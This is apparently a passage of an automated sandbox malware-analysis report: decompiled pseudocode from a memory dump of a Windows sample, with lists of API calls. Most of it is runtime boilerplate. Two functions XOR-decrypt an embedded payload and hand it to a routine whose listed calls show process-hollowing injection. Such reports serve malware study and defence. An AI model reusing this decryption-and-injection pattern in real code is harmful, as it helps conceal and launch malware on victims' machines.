    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
